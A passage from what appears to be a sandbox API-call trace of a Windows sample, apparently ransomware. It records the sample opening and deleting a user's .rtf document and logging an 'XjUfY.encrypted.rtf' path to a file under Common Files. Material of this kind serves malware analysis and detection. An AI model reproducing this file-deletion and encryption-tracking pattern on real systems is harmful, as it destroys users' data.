hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.027] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.028] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\xjufy.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0036.028] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.028] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.028] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.028] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.028] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.029] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.029] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.029] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.029] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.029] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.029] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.029] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.029] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.029] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.029] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.029] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.029] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.029] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", lpFilePart=0x0) returned 0x4d [0036.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd295210, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0x57e65cb0, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x152facc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1276b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="XjUfY.rtf", cAlternateFileName="")) returned 0x7c2240 [0036.029] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\xjufy.rtf")) returned 1 [0036.031] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd295210, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0x57e65cb0, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x152facc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1276b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="XjUfY.rtf", cAlternateFileName="")) returned 0 [0036.031] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.031] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.031] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.032] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.032] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.032] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.032] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.032] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.033] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.033] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.033] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.033] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.033] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.033] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.033] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.033] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1cb2, lpOverlapped=0x0) returned 1 [0036.033] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.033] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1cb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.033] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.encrypted.rtf\r\n", cchWideChar=90, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 90 [0036.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5a) returned 0x87a9d8 [0036.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.encrypted.rtf\r\n", cchWideChar=90, lpMultiByteStr=0x87a9d8, cbMultiByte=90, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.encrypted.rtf\r\n", lpUsedDefaultChar=0x0) returned 90 [0036.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0036.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0036.034] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x59, lpOverlapped=0x0) returned 1 [0036.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.034] CloseHandle (hObject=0x128) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.035] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.035] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.036] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.036] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.036] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.036] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.037] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, 